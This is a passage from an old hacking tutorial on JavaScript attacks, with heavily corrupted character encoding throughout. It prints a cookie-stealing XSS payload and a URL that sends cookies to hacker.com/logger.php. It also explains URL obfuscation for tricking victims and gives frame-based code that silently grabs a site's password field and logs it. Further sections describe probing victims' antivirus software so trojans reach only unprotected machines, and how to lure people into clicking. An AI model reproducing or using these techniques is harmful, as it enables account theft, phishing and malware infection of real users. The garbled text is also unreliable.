at the en".. &his is to trick the user into thinking that the link lea"s some*here else.? /gain% using
#avascript to manipulate *hat the user sees to help trick them.
/nother script in the e"ge engine that is vulnerable to cross site scriptting is boar".php% here is
the eploit
http://***.site.com/boar".php?searchD var u D
)tring.from<har<o"e!000=@$Iu R6BD )tring.from<har<o"e!000>9$Iu R6BD
)tring.from<har<o"e!000>9$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!0007/$Iu R6BD )tring.from<har<o"e!0006,$Iu R6BD
)tring.from<har<o"e!0006,$Iu R6BD )tring.from<har<o"e!000=6$Iu R6BD
)tring.from<har<o"e!00070$Iu R6BD )tring.from<har<o"e!000=>$Iu R6BD
)tring.from<har<o"e!0006L$Iu R6BD )tring.from<har<o"e!000=,$Iu R6BD
)tring.from<har<o"e!000>6$Iu R6BD )tring.from<har<o"e!000=>$Iu R6BD
)tring.from<har<o"e!0006,$Iu R6BD )tring.from<har<o"e!000=5$Iu R6BD
)tring.from<har<o"e!0006L$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!000=@$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!0007,$Iu R6BD
"ocument.cookieI"ocument.location.replace!u$I 8"i"De"ge0
sure am gla" bsrf "oesn(t run it I-$
)o ho* can a co"er stop this vulnerablitiy?? + *oul" say never print user inputte" "ata back to
the user.? also filter out C% F% an" pack all url enco"ing before filtering input.? + foun" a *ay to
steal cookies in the ol" ikonboar" using the profile.cgi% although it *asn(t too big a "eal since
there *as more serious holes in ikonboar" it still *ay ba" programming practice to print unfiltere"
input.? Jo* ikonboar" "oes not use profile.cgi% it "oesn(t print inputte" "ata to the screen% an" it
filters "ata. ? ?sually *eb base" email scripts are very vulnerable to cross site scriptting.. an"
that hol"s true for a vulnerability in solution script(s alais-mail script that + foun" last year.
/ fe* other problems *ith #avascript an" cookie stealing:
http://***.peacefire.org/security/hmattach/ - / hotmail eploit.? )ince hotmail "i"n(t filter
#avascript an" allo*e" .html attachments to be vie*e" an" not "o*nloa"e".
http://***.securityspace.com/eploit/eploitW5b.html
http://***.peacefire.org/security/iecookies/ - -pening the cookie #ar% remote cookie vie*er.?
using R6, instea" of / makes ie think it(s a intranet site.
http://homepages.para"ise.net.n4/Yglineham/cookiemonster.html
http://***.microsoft.com/technet/treevie*/"efault.asp?urlD/technet/security/bulletin/ms05-
0;;.asp - /ctually active scriptting% not #avascript.
&hen there is the ne* about:// an" file content rea"ing vulns in ie that have been reciently poste"
to bugtra2.. + plan on "iscussing these in "etail *hen + up"ate this tutorial.
0ost people say to me% Ebut no one *ith any clue about security is going to click on the link *hich
has #avascript to steal cookiesE an" this is true. When the plain url is http://site.com/vulnscript.cgi?
"ocument.location.relace!(http://hacker.com/logger.php?( K "ocument.cookie$I &hat is *hy *e
nee" to trick them into thinking the url isn(t "angerous. Here is one *ay:
obscuring urls:
-ne *ay of tricking a user into clicking a link they thought lea" some*here else *as to use that
onmouseover trick to make the url look like it is pointting some*here else. -bviously you cannot
use this *hile on protocols that "o not support html or that completely block #avascript an"
onmouseover. )o instea" of http://site.com you can have http://56>.0.0.5 this might not help too
much so ho* about *e use alittle trick. When bro*sers login to .htaccess "irectories they can use
the follo*ing synta:
http://username:pass*or"Zsite.com
Hou(ll see *hy this is important in a minute. Without the pass*or" you can have things like:
http://usernameZsite.com
an" it *ill *ork fine. +t *ill try to login to site.com *ith the username D (username( an" no
pass*or". Jo* *hat happen"s if there is no .htaccess file? &hen it "oesn(t matter *hat the
username or pass*or" is% an" the page loa"s normal. )o something like this coul" be use":
http://microsoft.com/site/"ir/help"esk.aspZsite.com
Hou see ho* this coul" be use" to get people to click on a link thinking it lea"s some*here else?
Lven if it is in plain tet many people *ill beleive this link goes to microsoft.com. Jo* that *e
have a link lets obscure it a bit D$
&here are many "ifferent *ays to obscure urls from users to help ai" you into tricking them. -ne
of them involves converting ip a""resses into their "ecimal e2uivilants. + am not going to cover
this% but there are plenty of other tutorials on the net *here you can learn. +(ll #ust let you use this
script to automaticly convert ip a""resses to the "ecimal value.
+'a +'b +'c +'" D
Jo* use this instea" of site.com an" you get something like:
http://microsoft.com/site/"ir/help"esk.aspZ7=7A;;070@R6,R=5R6LR=7R=>R=AR7, Sinsert
nasty #avascript url enco"e" hereT
no* that "oes not look like http://site.com/a.cgi? nasty #avascript
*hich *oul" be very clear for users to tell *hat it is "oing. 1ets go over the steps one more time%
#ust to be sure you got it. ,irst make up any site name !"oesn(t have to be vali" url$
http://aol.com/scripts/useri".#sp?
/"" a Z to the en"
http://aol.com/scripts/useri".#sp?Z
&hen the ip a""ress of the host in "ecimal form
http://aol.com/scripts/useri".#sp?Z7=7A;;070@
then the rest of the path in urlenco"ing.
http://microsoft.com/site/"ir/help"esk.aspZ7=7A;;070@R6,R=5R6LR=7R=>R=AR7,
/lso url enco"e the #avascript an" put it at the en". &his is #ust one metho" of obscuring the url%
there are others.
=. )tealing forms
-k% this metho" *ill not be use" very often% an" isn(t too valuable a skill to the average hacker..
But it can come in very han"y.? &his *as originally a ne*s post on my site% but it fits into this
tutorial nicely.? + kno* that this part might be very poorly eplaine" an" many people *on(t
un"erstan" ho* it *orks.? But + have trie" to atleast make it so people *ith a"vance" #avascript
kno*le"ge can make some sense of ho* the attack *orks.? /lso note that this attack is purely
theory% + have not use" this against an actual site yet.? +t might even be use" against sites *hich
re2uire you to fill in a form to login% this means hotmail% yahoo% an" 500%000%000 other sites% but it
*oul" re2uire etra co"ing% some of *hich + am not sure if it is possible.
-k% in this article + *ill eplain ho* to steal info from users by using #avascript.
What this eploit re2uires is: / script that prints info you *ant into an input fiel".?
&he script "oesn(t check the referrer.
&he most use" reason for this *oul" be to get usernames an" pass*or"s from sites.? /n
eample of this *oul" be cyberarmy.com *hich *as vulnerable to this for along time.? Hou *ill
notice that if *e "i" have the user(s cookie that *e coul" have simply vie*e" this page an" gotten
their pass*or"% but cyberarmy *as pretty secure in not printing unescape" "ata to the user(s
bro*ser.
Jo* *e *ill be "oing this:
5 main page *ith 6 frames.
frame V5 - *ill look like a normal page an" *ill steal the info from frame V6.
frame V6 - *ill loa" the page in a hi""en frame.
this is *hat the main page *ill look like:
-------- begin --------
ChtmlF
Cscript languageDEJava)criptEFCB--
"ocument.*rite!(Cframeset colsDE50R%NE framebor"erDEyesE framespacingDE0E bor"erDE7EF($I
//for the eample *e are using colsDE50R.NE but in a real life attack you *oul" use colsDE0p%NE or
something% as to hi"e the frame that is stealing the form value.
"ocument.*rite!(Cframe srcDEfuckca.htmlE scrollingDEnoE noresi4e nameDblahF($I
"ocument.*rite!(Cframe srcDEuserconfig.htmlE scrollingDEautoE noresi4e nameDvulnscriptF($I
"ocument.*rite!(CM/framesetF($I
//Hou might be *on"ering *hy + use" #avascript to print the CframesetF.? &his *as "one so *e
can print more #avascript on the page.? !the #avascript that steals the form value.
printhtml!0$I
function printhtml!counter$O
? if !counter DD 0$ O
? var theWtimeout D set&imeout!Eprinthtml!5$IE%55000$I
? counterKKI
? P
? var thehtml D *in"o*.vulnscript."ocument.all.tags!(H&01($S0T.innerH&01I
? *in"o*.vulnscript."ocument.open!Etet/htmlE$I
? *in"o*.vulnscript."ocument.*riteln!thehtml.substring!0%thehtml.in"e-f!(G/+3C//F($K@$$I
? *in"o*.vulnscript."ocument.*riteln!(--FCscript languageDE#avascriptEF($I
?
*in"o*.vulnscript."ocument.*riteln!(location.replace!http://***.cyberarmy.com/4ebulun/userconf
ig.pl$I($I
? *in"o*.vulnscript."ocument.*riteln!(CM/scriptFCB--($I
? *in"o*.vulnscript."ocument.*riteln!thehtml.substring!thehtml.in"e-f!(C&/B1L bor"erD0
cell'a""ingD0 cell)pacingD7 *i"thDA0RF($-5% thehtml.in"e-f!(C/htmlF($K>$$I
? *in"o*.vulnscript."ocument.close!$I
P
//--F
C/scriptF
C/htmlF
-------- en" --------
of course in real use the si4e of the cols *oul" be set so frame V6 !vulnscript$ *oul" be 0R.. )o
that the user *oul"n(t even kno* *hat is happening.
Jo* this is *hat the fuckca.html is:
-------- begin --------
ChtmlFCbo"yF
Cscript typeDEtet/#avascriptEF
CB--
var name5 D parent.vulnscript."ocument.formsS0T.pass5.valueI
parent.blah."ocument.*rite!name5$I
//--F
C/scriptF
C/bo"yFC/htmlF
-------- en" --------
all this "oes is print out the value of the first !unname"$ form from the frame name" vulnscript !the
one that has the page *here *e *ant to steal "ata from$.
&his is *hat their userconfig.pl "isplaye" that *e *ere grabbing:
'ass*or" : C+J'?& &H'LDEpass*or"E )+[LD9; J/0LDEpass5E 0/\1LJ:&HD5=
valueDEtestpassEF
&he problem is that it *oul" "isplay the pass*or" in plain tet !valueDEtestpassE - testpass is the
pass*or"$ *hy it "i" this + "on(t kno*% stupi" programming + guess.? But if you got a hol" of
someone(s cookie you coul" vie* that script an" it *oul" give you the pass.. )o *hat this little
trick *ith frames an" #avascript "oes is make users visit the page *ithout kno*ing an" then lets
our #avascript grab their pass*or".? +nstea" of printing the pass*or" to frame V5 !nameDblah$ *e
coul" have sent an invisible frame to a script *hich logs input.? Lample:
instea" of
parent.blah."ocument.*rite!name5$I
have
parent.vulnscript.location.replace!log.cgi?name5$I
+ *oul" then tell a fe* people *ho + *ant pass*or"s from about this page% say Ehey% *ant to see a
picture of my girlfrien"?E !/ll hack\0r guys like pics of girls$? then + *oul" #ust put up some stupi"
pic.. 0aybe Britney )pears or something. &he log.cgi *oul" log both name5 !their pass*or"$ an"
ULJQO(GL0-&LW/33G(P !their ip a""ress$.? &his *oul" let me match up usernames to
pass*or"s fairly easy.? Hou coul" also get their username from grabbing it off the page% or from
the contents of the cookie.
&his attack is fairly complicate"% so + "i"n(t eplain *hy + "i" a fe* things. + figure anyone *ho
coul" actually pull this off *oul" un"erstan" *hy.? /lso not many sites are vuln to this% an" even
the ones that are usually the attacker "oes not have the ability to hop on the irc channel an" trick
people into vie*ing it.
>. :aining +nfo -n ?sers
-k% this is probably the least likely techni2ue in this tutorial to be use".? /ll the rest can be use"
fairly often.? &his one is use" to gain enough info on someone in or"er to form a tro#an attack on
them.? What this #avascript *ill allo* us to "o is to probe their system an" see if they have any
security against our attack.? +t *ill let us see *hat anti-virus program they use% *hat fire*all they
use% an" if they have any programs that allo* us to infect them *ith macros.
&his *as originally a bugtra2 post: ! http://***.securityfocus.com/archive/5/669=>7 $ *ith a link
to the eample at http://geocities.com/"44ie/sysWsnoop5.html but *e are going to probe for more
security relate" programs. !put a probe for anti-virus programs% fire*alls% *or"% a"obe acrobat
Sp"fT$
1ets say *e check for anti-virus programs% if they "on(t have any you can "isplay a link to
"o*nloa" sub> an" say it is a vi"eo game... if they "o have an anti-virus program you can "isplay
the link to the real game.? &his *ay you "on(t have to *orry about the user fin"ing out that you
trie" to sen" them a tro#an.? -nly users *ho "on(t have an anti-virus program *ill have
"o*nloa"e" the tro#an.
-ne possible future for tro#an(s is mo"ules that you can insert to attack specific programs.? ,or
instance if you kno* the user is running a certain type of anti-virus program an" they are running
a certain type of fire*all you can plug those mo"ules into the tro#an.? When the user "o*nloa"s
an" runs this tro#an the mo"ules *ill tro#an those anti-virus an" fire*all making them seem as if
they are running fine% *hen they aren(t.? Lther they *on(t "etect your tro#an or they *ill replace
them *ith a emtpy program that #ust puts the icons in the taskbar an" task list.? + *ill try to get a
*orking "eminstration of ho* #avascript can be use" to "o*nloa" the correct tro#an for a user(s
system or "etect if the tro#an *ill be "etecte" by an anti-virus program so it *ill make them
"o*nloa" a regular file.
+f you have a fire*all or anti-virus program please sen" me the full a""ress !absolute a""ress$ to
all the images it has.? email the list to b0ilerZhotmail.com ? What the #avascript *ill "o is try an"
loa" that image% if it "oes then ie *ill return a true value% if it "oesn(t ie *ill return false an" *e *ill
kno* the user "oes not have that soft*are installe".? When + get enough info on the main anti-
virus an" main fire*alls + *ill put together the co"e an" eplain it better.
&his section isn(t really "one% but + am getting sick of *riting so + guess +(ll have to finish it later.?
/ll + am going to "o is a"" a "emo of ho* to check for anti-virus programs.
@. )tories -f Javascript Hacks
+ have "eci"e" to a"" a section here of a fe* interesting #avascript hacks + have hear" about an"
seen.? )ince normal *eb site "efacments an" such are full of script ki""ies *ho #ust ./o*n
site.com *ith no creativity or thought + like to hear a nice story of hackers coming up *ith cool
*ays to manipulate systems an" people.
,irst story is about a *ebgame calle" re"lite !taken from a tutorial + *rote a fe* *eeks ago$
What happen" *as that a frien" of mine foun" his first eploit an" *ith the help of someone else
co"ing it - got it to *ork really goo".? Before + continue *ith the story you(ll nee" to kno* alittle bit
about the situation.
+n Vb0g on us.un"ernet.org% a place *here + hang out sometimes there is alot of people into this
online game calle" re"lite .? &he ob#ect of the game is to fight people in an online version of a
"rug *ar.? Hou have crack% hoes% guns% money% an" the like.? Jo* a fe* "ays prior to this + *as
about to sign up for it #ust to see *hat all the fuss *as about% as + *as signing up + sa* that the
registration script prints *hat is inputte" to it.? &he script also "i"n(t filter anything but ( an" E from
the input% so it coul" be use" to steal cookies from users.? + co"e" up the eploit an" teste" it...
everything *orke" fine.? But + never foun" out if you can "o anything *ith #ust a user(s cookie.?
/n" + "i"n(t really care about the game% so the eploit never really got use".? When + *ent back
into Vb0g ha4e an" tak% t*o re"lite players an" b0g gimps ha" foun" another script that prints
something to a page.
&he page that it prints to is their player